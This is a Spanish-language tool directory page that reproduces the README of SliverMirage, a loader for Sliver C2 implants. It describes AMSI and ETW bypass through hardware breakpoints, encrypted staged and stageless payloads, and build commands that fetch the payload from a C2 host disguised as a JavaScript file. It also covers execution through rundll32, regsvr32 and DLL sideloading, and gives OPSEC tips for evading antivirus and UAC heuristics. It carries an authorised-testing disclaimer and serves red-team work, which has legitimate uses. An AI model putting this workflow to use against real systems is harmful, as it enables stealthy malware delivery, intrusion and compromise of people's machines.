Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
SliverMirage — Cargador PICO Crystal Palace para Sliver C2 bypass de AMSI de doble capa, silenciamiento de ETW, payloads cifrados con AES-256-CBC, 6 variantes de entrega | Kitploit
Herramientas/GitHubGitHub/daniomass/slivermirage
ExplotaciónPost-ExplotaciónAnálisis de MalwareComando y ControlAnálisis de BinariosRed TeamingDesarrollo de Payloads
GitHubdaniomass/slivermirage

SliverMirage

Cargador PICO Crystal Palace para Sliver C2 bypass de AMSI de doble capa, silenciamiento de ETW, payloads cifrados con AES-256-CBC, 6 variantes de entrega

Ver Repositorio
154hace 5 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

SliverMirage

Un fork de CrystalSliver, que extiende el cargador PICO de Crystal Palace con bypass de AMSI de doble capa, silenciamiento de ETW y seis variantes de entrega para Sliver C2.

Qué hace

SliverMirage envuelve un DLL de implante de Sliver mediante la virtualización PICO de Crystal Palace, y lo entrega a través de un cargador que neutraliza AMSI y ETW sin parchear amsi.dll ni ntdll.dll.

Pila de evasión:

CapaTécnicaDetalle
AMSI L1Corrupción de strings de CLRLdrRegisterDllNotification intercepta la carga de clr.dll, corrompe AmsiScanBuffer en .rdata antes de que CLR llame a GetProcAddress
AMSI L2VEH + HWBPEl manejador de excepciones vectorizadas (VEH) sobre AmsiScanBuffer devuelve E_INVALIDARG
ETWHWBPDR1 en NtTraceControl, devuelve STATUS_SUCCESS
PayloadAES-256-CBC + XORDescifrado con BCrypt, VirtualAlloc(RW) -> VirtualProtect(RX), sin RWX
VirtualizaciónCrystal Palace PICOEl DLL de Sliver se ejecuta dentro de un proceso PICO, invisible para el AV de modo usuario

Variantes

FormatoArchivoDistribución¿C2 en tiempo de ejecución?
exeEXE por etapasEXE + payload.dat en el sitio web de C2Sí (HTTPS)
exe-stagelessEXE sin etapasEXE únicoNo
dllDLL sin etapasDLL únicoNo
dll-stagedDLL por etapasDLL + payload.dat en el sitio web de C2Sí (HTTPS)
shellcodeShellcode por etapas.bin + payload.datSí (HTTPS)
shellcode-stagelessShellcode sin etapas.bin únicoNo

Las variantes por etapas descargan el PICO cifrado en tiempo de ejecución desde un sitio web HTTPS de Sliver. El EXE/DLL es pequeño (~20 KB) y no lleva payload en disco.

Las variantes sin etapas incrustan el PICO cifrado en tiempo de compilación (doble capa XOR + AES). Ocupan más en disco, pero cero actividad de red antes del callback del beacon.

Inicio rápido

Requisitos previos

  • x86_64-w64-mingw32-gcc (mingw-w64)
  • nasm
  • python3 con pefile (pip install pefile)
  • openssl
  • Java 17 (para Crystal Palace — aprovisionado automáticamente por build.sh)

Compilar con build.sh (recomendado)

El script de compilación aprovisiona automáticamente las dependencias que falten (incluidos Crystal Palace y Java 17) y gestiona todo el proceso: DLL -> Crystal Palace PICO -> cifrado -> compilación.

root@kitploit:~
# Staged EXE (default)
./build.sh --dll /path/to/sliver_implant.dll --host 10.0.0.1

# Stageless EXE
./build.sh --dll /path/to/sliver_implant.dll --format exe-stageless

# Stageless DLL
./build.sh --dll /path/to/sliver_implant.dll --format dll

# Staged DLL
./build.sh --dll /path/to/sliver_implant.dll --format dll-staged --host 10.0.0.1

# Shellcode (staged)
./build.sh --dll /path/to/sliver_implant.dll --format shellcode --host 10.0.0.1

# Shellcode (stageless)
./build.sh --dll /path/to/sliver_implant.dll --format shellcode-stageless

Opciones:

  • --dll <path> — DLL del implante de Sliver (obligatorio)
  • --host <ip> — IP del servidor C2 (obligatoria para formatos por etapas)
  • --port <port> — Puerto de C2 (por defecto: 443)
  • --path <path> — Ruta URL para la descarga del payload (por defecto: /assets/js/vendor.js)
  • --format <fmt> — Formato de salida (por defecto: exe)
  • --export <name> — Nombre personalizado de exportación del DLL

Compilar con Make (manual)

Si ya tienes un blob PICO de Crystal Palace:

root@kitploit:~
# Staged EXE
make PICO=/path/to/implant.crystal.bin C2_HOST=10.0.0.1

# Stageless EXE
make exe-stageless PICO=/path/to/implant.crystal.bin

# Stageless DLL
make dll PICO=/path/to/implant.crystal.bin

# All targets
make clean

Despliegue

Por etapas (EXE o DLL)

  1. Sube build/payload.dat a un sitio web HTTPS de Sliver:

    root@kitploit:~
    sliver > websites add-content --website cover \
      --web-path /assets/js/vendor.js \
      --content-type application/javascript \
      --content build/payload.dat
    
  2. Entrega build/csvchelper.exe (o .dll) al objetivo.

Sin etapas

Entrega de un solo archivo. No se necesita configurar un sitio web C2.

Métodos de ejecución del DLL

root@kitploit:~
rundll32 csvchelper.dll,StartW
regsvr32 /s csvchelper.dll

O usa el sideloading de DLL (cámbiale el nombre para que coincida con un DLL legítimo que cargue la aplicación objetivo).

Exportaciones: DllRegisterServer, DllUnregisterServer, StartW, VoidFunc

Estructura del proyecto

root@kitploit:~
SliverMirage/
  loader/                    # Crystal Palace PICO loader (from CrystalSliver)
    src/                     # Loader C sources + draugr ASM
    loader.spec              # Crystal Palace linker spec
    pico.spec                # PICO generation spec
  src/
    stager_remote.c          # Staged EXE
    stager_stageless.c       # Stageless EXE
    stager_remote_dll.c      # Staged DLL
    stager_stageless_dll.c   # Stageless DLL
    stager_debug.c           # Debug EXE (MessageBox diagnostics)
  scripts/
    gen_payload.py           # AES-256-CBC encrypt (staged)
    gen_payload_stageless.py # AES + XOR embed (stageless)
    dll_to_shellcode.py      # sRDI DLL-to-shellcode converter
  resources/
    resource.rc              # Version info (EXE)
    resource_dll.rc          # Version info (DLL)
    manifest.xml             # asInvoker manifest
  libtcg.x64.zip             # TCG library for Crystal Palace
  Makefile
  build.sh

Notas de OPSEC

  • El IAT está limpio: solo kernel32, advapi32, bcrypt — todas son API legítimas de Windows
  • Sin parches en memoria: el bypass de AMSI/ETW usa puntos de interrupción por hardware, no VirtualProtect sobre DLL del sistema
  • Sin RWX: la memoria del payload pasa de RW -> RX, nunca RWX
  • Subsistema GUI: punto de entrada WinMain, -mwindows — sin destello de consola
  • Información de versión + manifiesto: el manifiesto asInvoker integrado suprime las heurísticas de UAC
  • Control de entropía: los payloads sin etapas usan clave XOR rotativa para reducir la entropía de ~7.8 a ~6.0-6.5
  • Personaliza resource.rc / resource_dll.rc con tu identidad de cobertura antes de compilar.

Aviso legal

Este proyecto está destinado únicamente a pruebas de seguridad autorizadas, investigación y fines educativos. Úsalo exclusivamente en entornos donde tengas permiso explícito por escrito para realizar pruebas de penetración. El acceso no autorizado a sistemas informáticos es ilegal. Los autores no asumen ninguna responsabilidad por el mal uso de este software.

Créditos

  • Crystal Palace por Rasta Mouse — motor de virtualización PICO
  • CrystalSliver — integración original de Crystal Palace + Sliver
  • sRDI por Nick Landers — técnica de inyección reflectiva de DLL mediante shellcode

Licencia

MIT

Descargar herramienta